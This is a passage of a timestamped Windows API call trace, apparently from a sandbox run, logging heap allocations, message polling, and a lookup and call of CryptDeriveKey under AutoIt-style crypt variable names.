[0248.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0248.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0248.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0248.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0248.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0248.320] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0248.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0248.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0248.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0248.321] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0248.321] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0248.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0248.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0248.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0248.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0248.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0248.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e518e0 [0248.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e518e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0248.325] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0248.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0248.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0248.326] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87490) returned 1 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0248.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0248.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0248.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0248.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0248.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 